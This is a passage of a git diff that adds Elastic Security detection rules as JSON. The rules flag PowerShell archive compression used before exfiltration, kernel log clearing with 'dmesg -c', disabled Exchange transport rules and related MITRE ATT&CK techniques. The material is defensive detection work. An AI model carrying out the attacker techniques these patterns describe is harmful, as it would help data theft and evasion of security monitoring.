"https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "user.id" + ], + "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 207 + }, + "id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d_207", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_105.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_105.json new file mode 100644 index 00000000000..606f6f5d5bf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_105.json @@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to archive compression activities. Adversaries will often compress and encrypt data in preparation for exfiltration.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\\\\*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\Microsoft Dependency Agent\\\\plugins\\\\*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\Azure\\\\StorageSyncAgent\\\\AFSDiag.ps1" + } + } + } + } + ], + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Archive Compression Capabilities", + "query": "event.category:process and host.os.type:windows and\n(\n powershell.file.script_block_text : (\n \"IO.Compression.ZipFile\" or\n \"IO.Compression.ZipArchive\" or\n \"ZipFile.CreateFromDirectory\" or\n \"IO.Compression.BrotliStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GZipStream\" or\n \"IO.Compression.ZLibStream\"\n ) and \n powershell.file.script_block_text : (\n \"CompressionLevel\" or\n \"CompressionMode\" or\n \"ZipArchiveMode\"\n ) or\n powershell.file.script_block_text : \"Compress-Archive\"\n)\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "27071ea3-e806-4697-8abc-e22c92aa4293_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_5.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_5.json new file mode 100644 index 00000000000..a911973541d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_5.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to archive compression activities. Adversaries will often compress and encrypt data in preparation for exfiltration.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Archive Compression Capabilities", + "query": "event.category:process and host.os.type:windows and\n(\n powershell.file.script_block_text : (\n \"IO.Compression.ZipFile\" or\n \"IO.Compression.ZipArchive\" or\n \"ZipFile.CreateFromDirectory\" or\n \"IO.Compression.BrotliStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GZipStream\" or\n \"IO.Compression.ZLibStream\"\n ) and \n powershell.file.script_block_text : (\n \"CompressionLevel\" or\n \"CompressionMode\" or\n \"ZipArchiveMode\"\n ) or\n powershell.file.script_block_text : \"Compress-Archive\"\n) and \n not file.path : (\n ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\Downloads\\\\\\\\* or\n ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\DataCollection\\\\\\\\* or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Microsoft?Dependency?Agent\\\\\\\\plugins\\\\\\\\* or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Azure\\\\\\\\StorageSyncAgent\\\\\\\\AFSDiag.ps1\n )\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "27071ea3-e806-4697-8abc-e22c92aa4293_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_2.json b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_2.json new file mode 100644 index 00000000000..774a3acc07c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_2.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the deletion of the kernel ring buffer events through dmesg. Attackers may clear kernel ring buffer events to evade detection after installing a Linux kernel module (LKM).", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Clear Kernel Ring Buffer", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\") and\nevent.type == \"start\" and process.name == \"dmesg\" and process.args : \"-c\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2724808c-ba5d-48b2-86d2-0002103df753", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.002", + "name": "Clear Linux or Mac System Logs", + "reference": "https://attack.mitre.org/techniques/T1070/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "2724808c-ba5d-48b2-86d2-0002103df753_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_3.json b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_3.json new file mode 100644 index 00000000000..17834dbdc1a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_3.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the deletion of the kernel ring buffer events through dmesg. Attackers may clear kernel ring buffer events to evade detection after installing a Linux kernel module (LKM).", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Clear Kernel Ring Buffer", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"dmesg\" and process.args == \"-c\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2724808c-ba5d-48b2-86d2-0002103df753", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.002", + "name": "Clear Linux or Mac System Logs", + "reference": "https://attack.mitre.org/techniques/T1070/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "2724808c-ba5d-48b2-86d2-0002103df753_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_4.json b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_4.json new file mode 100644 index 00000000000..ada9f784fd4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_4.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the deletion of the kernel ring buffer events through dmesg. Attackers may clear kernel ring buffer events to evade detection after installing a Linux kernel module (LKM).", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Clear Kernel Ring Buffer", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"dmesg\" and process.args == \"-c\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2724808c-ba5d-48b2-86d2-0002103df753", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.002", + "name": "Clear Linux or Mac System Logs", + "reference": "https://attack.mitre.org/techniques/T1070/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "2724808c-ba5d-48b2-86d2-0002103df753_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_103.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_103.json new file mode 100644 index 00000000000..87b31135047 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_103.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A transport rule may be modified by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-TransportRule\" or \"Disable-TransportRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "272a6484-2663-46db-a532-ef734bf9a796", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "272a6484-2663-46db-a532-ef734bf9a796_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_105.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_105.json new file mode 100644 index 00000000000..55eea07216f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_105.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A transport rule may be modified by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-TransportRule\" or \"Disable-TransportRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "272a6484-2663-46db-a532-ef734bf9a796", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "272a6484-2663-46db-a532-ef734bf9a796_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_206.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_206.json new file mode 100644 index 00000000000..1cc12466154 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_206.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A transport rule may be modified by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-TransportRule\" or \"Disable-TransportRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "272a6484-2663-46db-a532-ef734bf9a796", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "272a6484-2663-46db-a532-ef734bf9a796_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_108.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_108.json new file mode 100644 index 00000000000..6c37cf7bf23 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_108.json @@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote execution via Windows PowerShell remoting. Windows PowerShell remoting allows a user to run any Windows PowerShell command on one or more remote computers. This could be an indication of lateral movement.", + "false_positives": [ + "PowerShell remoting is a dual-use protocol that can be used for benign or malicious activity. It's important to baseline your environment to determine the amount of noise to expect from this tool." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + 